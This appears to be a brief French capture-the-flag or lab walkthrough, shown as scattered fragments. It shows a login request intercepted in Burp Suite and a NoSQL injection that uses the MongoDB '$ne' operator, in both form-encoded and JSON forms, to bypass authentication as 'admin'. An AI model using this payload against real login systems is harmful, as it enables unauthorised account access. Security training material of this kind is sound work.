Interception de la requête avec Burp Suite.
Test des injections classiques :
Cela ne fonctionne pas.
Conversion en JSON et modification du Content-Type en application/json :
Content-Type
application/json
Résultat : Authentification réussie !
Mis à jour il y a 1 an
username=admin&password[$ne]=toto
{ "user": "admin", "password": { "$ne": null } }
